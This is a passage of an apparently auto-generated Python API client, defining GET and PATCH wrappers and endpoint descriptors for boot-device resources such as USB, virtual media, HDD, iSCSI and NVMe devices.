        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object will be returned without reading/decoding response
            data. Default is True.
        _request_timeout (float/tuple): timeout setting for this
            request. If one number provided, it will be total request
            timeout. It can also be a pair (tuple) of
            (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that
            we want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootUsbDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard client-side options; dict.setdefault keeps
    # any value the caller supplied explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid  # required path parameter
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/boot/UsbDevices/{Moid}.
# Binds parameter typing/placement metadata to the
# __get_boot_usb_device_by_moid wrapper defined above.
self.get_boot_usb_device_by_moid = _Endpoint(
    settings={
        'response_type': (BootUsbDevice,),
        # NOTE(review): 'oAuth2' is listed twice (generator artifact);
        # redundant but harmless.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/UsbDevices/{Moid}',
        'operation_id': 'get_boot_usb_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # Python argument name -> wire name.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_usb_device_by_moid
)
def __get_boot_usb_device_list(
    self,
    **kwargs
):
    """Read a 'boot.UsbDevice' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_usb_device_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData-style "$filter" predicate expression that
            selects the subset of resources to return. [optional] if
            omitted the server will use the default value of ""
        orderby (str): Properties used to sort the returned collection.
            [optional]
        top (int): Maximum number of resources to return in the
            response. [optional] if omitted the server will use the
            default value of 100
        skip (int): Number of resources to skip in the response.
            [optional] if omitted the server will use the default
            value of 0
        select (str): Subset of properties to return. [optional] if
            omitted the server will use the default value of ""
        expand (str): Additional attributes or related resources to
            return with the primary resources. [optional]
        apply (str): Sequence of "$apply" set transformations
            ("aggregate", "groupby"), separated by forward slashes and
            applied consecutively. [optional]
        count (bool): Return the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Request an inline count of the matching
            resources included with the response. [optional] if omitted
            the server will use the default value of "allpages"
        at (str): Like "$filter", but matched against versioning
            information properties of the resources. [optional]
        tags (str): Request a summary of Tag utilization (keys, usage
            counts, assigned values) for this resource. [optional]
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object will be returned without reading/decoding response
            data. Default is True.
        _request_timeout (float/tuple): timeout setting for this
            request. If one number provided, it will be total request
            timeout. It can also be a pair (tuple) of
            (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that
            we want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootUsbDeviceResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard client-side options; dict.setdefault keeps
    # any value the caller supplied explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/boot/UsbDevices. Binds the
# OData-style query parameters to their wire names/locations and
# dispatches to the __get_boot_usb_device_list wrapper above.
self.get_boot_usb_device_list = _Endpoint(
    settings={
        'response_type': (BootUsbDeviceResponse,),
        # NOTE(review): 'oAuth2' appears twice (generator artifact);
        # redundant but harmless.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/UsbDevices',
        'operation_id': 'get_boot_usb_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        # Only 'inlinecount' is restricted to an enumerated value set.
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # Python argument name -> query-parameter name on the wire.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter of this operation travels in the query string.
        'location_map': {
            name: 'query'
            for name in (
                'filter', 'orderby', 'top', 'skip', 'select', 'expand',
                'apply', 'count', 'inlinecount', 'at', 'tags',
            )
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_usb_device_list
)
def __get_boot_vmedia_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.VmediaDevice' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_vmedia_device_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object will be returned without reading/decoding response
            data. Default is True.
        _request_timeout (float/tuple): timeout setting for this
            request. If one number provided, it will be total request
            timeout. It can also be a pair (tuple) of
            (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that
            we want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootVmediaDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard client-side options; dict.setdefault keeps
    # any value the caller supplied explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid  # required path parameter
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/boot/VmediaDevices/{Moid}.
# Binds parameter typing/placement metadata to the
# __get_boot_vmedia_device_by_moid wrapper defined above.
self.get_boot_vmedia_device_by_moid = _Endpoint(
    settings={
        'response_type': (BootVmediaDevice,),
        # NOTE(review): 'oAuth2' is listed twice (generator artifact);
        # redundant but harmless.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/VmediaDevices/{Moid}',
        'operation_id': 'get_boot_vmedia_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # Python argument name -> wire name.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_vmedia_device_by_moid
)
def __get_boot_vmedia_device_list(
    self,
    **kwargs
):
    """Read a 'boot.VmediaDevice' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_vmedia_device_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData-style "$filter" predicate expression that
            selects the subset of resources to return. [optional] if
            omitted the server will use the default value of ""
        orderby (str): Properties used to sort the returned collection.
            [optional]
        top (int): Maximum number of resources to return in the
            response. [optional] if omitted the server will use the
            default value of 100
        skip (int): Number of resources to skip in the response.
            [optional] if omitted the server will use the default
            value of 0
        select (str): Subset of properties to return. [optional] if
            omitted the server will use the default value of ""
        expand (str): Additional attributes or related resources to
            return with the primary resources. [optional]
        apply (str): Sequence of "$apply" set transformations
            ("aggregate", "groupby"), separated by forward slashes and
            applied consecutively. [optional]
        count (bool): Return the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Request an inline count of the matching
            resources included with the response. [optional] if omitted
            the server will use the default value of "allpages"
        at (str): Like "$filter", but matched against versioning
            information properties of the resources. [optional]
        tags (str): Request a summary of Tag utilization (keys, usage
            counts, assigned values) for this resource. [optional]
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object will be returned without reading/decoding response
            data. Default is True.
        _request_timeout (float/tuple): timeout setting for this
            request. If one number provided, it will be total request
            timeout. It can also be a pair (tuple) of
            (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that
            we want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootVmediaDeviceResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard client-side options; dict.setdefault keeps
    # any value the caller supplied explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/boot/VmediaDevices. Binds the
# OData-style query parameters to their wire names/locations and
# dispatches to the __get_boot_vmedia_device_list wrapper above.
self.get_boot_vmedia_device_list = _Endpoint(
    settings={
        'response_type': (BootVmediaDeviceResponse,),
        # NOTE(review): 'oAuth2' appears twice (generator artifact);
        # redundant but harmless.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/VmediaDevices',
        'operation_id': 'get_boot_vmedia_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        # Only 'inlinecount' is restricted to an enumerated value set.
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # Python argument name -> query-parameter name on the wire.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter of this operation travels in the query string.
        'location_map': {
            name: 'query'
            for name in (
                'filter', 'orderby', 'top', 'skip', 'select', 'expand',
                'apply', 'count', 'inlinecount', 'at', 'tags',
            )
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_vmedia_device_list
)
def __patch_boot_cdd_device(
    self,
    moid,
    boot_cdd_device,
    **kwargs
):
    """Update a 'boot.CddDevice' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.patch_boot_cdd_device(moid, boot_cdd_device, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_cdd_device (BootCddDevice): The 'boot.CddDevice' resource
            to update.
    Keyword Args:
        if_match (str): Optimistic-concurrency guard: set to the value
            of the resource's ModTime property (as returned by a prior
            GET) so the update is rejected with 412 (Precondition
            Failed) if the resource changed since it was fetched,
            preventing the lost-update problem. [optional]
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object will be returned without reading/decoding response
            data. Default is True.
        _request_timeout (float/tuple): timeout setting for this
            request. If one number provided, it will be total request
            timeout. It can also be a pair (tuple) of
            (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that
            we want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootCddDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard client-side options; dict.setdefault keeps
    # any value the caller supplied explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid  # required path parameter
    kwargs['boot_cdd_device'] = boot_cdd_device  # required request body
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: PATCH /api/v1/boot/CddDevices/{Moid}. Binds the
# path/body/header parameters to their wire names/locations and
# dispatches to the __patch_boot_cdd_device wrapper defined above.
self.patch_boot_cdd_device = _Endpoint(
    settings={
        'response_type': (BootCddDevice,),
        # NOTE(review): 'oAuth2' is listed twice (generator artifact);
        # redundant but harmless.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/CddDevices/{Moid}',
        'operation_id': 'patch_boot_cdd_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': ['moid', 'boot_cdd_device', 'if_match'],
        'required': ['moid', 'boot_cdd_device'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
            'boot_cdd_device': (BootCddDevice,),
            'if_match': (str,),
        },
        # 'boot_cdd_device' has no wire name: it travels as the body.
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_cdd_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_cdd_device
)
def __patch_boot_device_boot_mode(
    self,
    moid,
    boot_device_boot_mode,
    **kwargs
):
    """Update a 'boot.DeviceBootMode' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.patch_boot_device_boot_mode(moid, boot_device_boot_mode, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_device_boot_mode (BootDeviceBootMode): The 'boot.DeviceBootMode' resource to update.

    Keyword Args:
        if_match (str): Optimistic-concurrency guard. Set it to the ModTime
            of the resource obtained from a prior GET; the server rejects
            the request with 412 (Precondition Failed) if the resource was
            modified since it was fetched, preventing the lost-update
            problem. [optional]
        _return_http_data_only (bool): return the response data only,
            without the HTTP status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request.
            A single number is the total request timeout; a pair (tuple)
            gives (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that we
            want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        BootDeviceBootMode
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults only where the caller did not pass a value;
    # setdefault is equivalent to the generated get()-then-reassign
    # pattern, minus the redundant reassignment.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index', None)
    # Forward positional arguments as keywords so the _Endpoint machinery
    # can validate and route them uniformly.
    kwargs['moid'] = moid
    kwargs['boot_device_boot_mode'] = boot_device_boot_mode
    return self.call_with_http_info(**kwargs)
self.patch_boot_device_boot_mode = _Endpoint(
    settings={
        'response_type': (BootDeviceBootMode,),
        # NOTE(review): duplicate 'oAuth2' entry from the generator removed;
        # listing the same auth scheme twice is redundant.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/DeviceBootModes/{Moid}',
        'operation_id': 'patch_boot_device_boot_mode',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_device_boot_mode',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_device_boot_mode',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
            'boot_device_boot_mode': (BootDeviceBootMode,),
            'if_match': (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_device_boot_mode': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_device_boot_mode
)
def __patch_boot_device_boot_security(
    self,
    moid,
    boot_device_boot_security,
    **kwargs
):
    """Update a 'boot.DeviceBootSecurity' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.patch_boot_device_boot_security(moid, boot_device_boot_security, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_device_boot_security (BootDeviceBootSecurity): The 'boot.DeviceBootSecurity' resource to update.

    Keyword Args:
        if_match (str): Optimistic-concurrency guard. Set it to the ModTime
            of the resource obtained from a prior GET; the server rejects
            the request with 412 (Precondition Failed) if the resource was
            modified since it was fetched, preventing the lost-update
            problem. [optional]
        _return_http_data_only (bool): return the response data only,
            without the HTTP status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request.
            A single number is the total request timeout; a pair (tuple)
            gives (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that we
            want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        BootDeviceBootSecurity
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults only where the caller did not pass a value.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index', None)
    # Forward positional arguments as keywords for the _Endpoint machinery.
    kwargs['moid'] = moid
    kwargs['boot_device_boot_security'] = boot_device_boot_security
    return self.call_with_http_info(**kwargs)
self.patch_boot_device_boot_security = _Endpoint(
    settings={
        'response_type': (BootDeviceBootSecurity,),
        # NOTE(review): duplicate 'oAuth2' entry from the generator removed.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/DeviceBootSecurities/{Moid}',
        'operation_id': 'patch_boot_device_boot_security',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_device_boot_security',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_device_boot_security',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
            'boot_device_boot_security': (BootDeviceBootSecurity,),
            'if_match': (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_device_boot_security': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_device_boot_security
)
def __patch_boot_hdd_device(
    self,
    moid,
    boot_hdd_device,
    **kwargs
):
    """Update a 'boot.HddDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.patch_boot_hdd_device(moid, boot_hdd_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_hdd_device (BootHddDevice): The 'boot.HddDevice' resource to update.

    Keyword Args:
        if_match (str): Optimistic-concurrency guard. Set it to the ModTime
            of the resource obtained from a prior GET; the server rejects
            the request with 412 (Precondition Failed) if the resource was
            modified since it was fetched, preventing the lost-update
            problem. [optional]
        _return_http_data_only (bool): return the response data only,
            without the HTTP status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request.
            A single number is the total request timeout; a pair (tuple)
            gives (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that we
            want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        BootHddDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults only where the caller did not pass a value.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index', None)
    # Forward positional arguments as keywords for the _Endpoint machinery.
    kwargs['moid'] = moid
    kwargs['boot_hdd_device'] = boot_hdd_device
    return self.call_with_http_info(**kwargs)
self.patch_boot_hdd_device = _Endpoint(
    settings={
        'response_type': (BootHddDevice,),
        # NOTE(review): duplicate 'oAuth2' entry from the generator removed.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/HddDevices/{Moid}',
        'operation_id': 'patch_boot_hdd_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_hdd_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_hdd_device',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
            'boot_hdd_device': (BootHddDevice,),
            'if_match': (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_hdd_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_hdd_device
)
def __patch_boot_iscsi_device(
    self,
    moid,
    boot_iscsi_device,
    **kwargs
):
    """Update a 'boot.IscsiDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.patch_boot_iscsi_device(moid, boot_iscsi_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_iscsi_device (BootIscsiDevice): The 'boot.IscsiDevice' resource to update.

    Keyword Args:
        if_match (str): Optimistic-concurrency guard. Set it to the ModTime
            of the resource obtained from a prior GET; the server rejects
            the request with 412 (Precondition Failed) if the resource was
            modified since it was fetched, preventing the lost-update
            problem. [optional]
        _return_http_data_only (bool): return the response data only,
            without the HTTP status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request.
            A single number is the total request timeout; a pair (tuple)
            gives (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that we
            want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        BootIscsiDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults only where the caller did not pass a value.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index', None)
    # Forward positional arguments as keywords for the _Endpoint machinery.
    kwargs['moid'] = moid
    kwargs['boot_iscsi_device'] = boot_iscsi_device
    return self.call_with_http_info(**kwargs)
self.patch_boot_iscsi_device = _Endpoint(
    settings={
        'response_type': (BootIscsiDevice,),
        # NOTE(review): duplicate 'oAuth2' entry from the generator removed.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/IscsiDevices/{Moid}',
        'operation_id': 'patch_boot_iscsi_device',
        'http_method': 'PATCH',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_iscsi_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_iscsi_device',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
            'boot_iscsi_device': (BootIscsiDevice,),
            'if_match': (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_iscsi_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__patch_boot_iscsi_device
)
def __patch_boot_nvme_device(
    self,
    moid,
    boot_nvme_device,
    **kwargs
):
    """Update a 'boot.NvmeDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.patch_boot_nvme_device(moid, boot_nvme_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_nvme_device (BootNvmeDevice): The 'boot.NvmeDevice' resource to update.

    Keyword Args:
        if_match (str): Optimistic-concurrency guard. Set it to the ModTime
            of the resource obtained from a prior GET; the server rejects
            the request with 412 (Precondition Failed) if the resource was
            modified since it was fetched, preventing the lost-update
            problem. [optional]
        _return_http_data_only (bool): return the response data only,
            without the HTTP status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request.
            A single number is the total request timeout; a pair (tuple)
            gives (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that we
            want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        BootNvmeDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Apply defaults only where the caller did not pass a value.
    kwargs.setdefault('async_req', False)
